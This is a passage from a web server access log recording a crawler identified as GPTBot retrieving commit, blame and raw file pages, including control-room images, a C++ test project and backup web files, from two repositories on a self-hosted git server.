GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" -[17/Feb/2026:14:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode" -[17/Feb/2026:14:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11105] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" -[17/Feb/2026:14:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11671] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" -[17/Feb/2026:14:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" -[17/Feb/2026:14:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699390] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508445] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641784] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692338] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429933] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498818] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10767] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:14:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" -[17/Feb/2026:14:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49516] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" -[17/Feb/2026:14:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" -[17/Feb/2026:14:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 57824] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:14:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 77674] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:14:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 400245] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:14:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" -[17/Feb/2026:14:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" -[17/Feb/2026:14:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" -[17/Feb/2026:14:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" -[17/Feb/2026:14:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" -[17/Feb/2026:14:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" -[17/Feb/2026:14:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" -[17/Feb/2026:14:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" -[17/Feb/2026:14:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" -[17/Feb/2026:14:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" -[17/Feb/2026:14:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" -[17/Feb/2026:14:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" -[17/Feb/2026:14:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:14:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:14:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:14:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:14:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10841] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:14:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:14:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:14:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:14:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:14:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" -[17/Feb/2026:14:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 7269827] [Gzip 12.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" -[17/Feb/2026:14:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699382] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498799] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 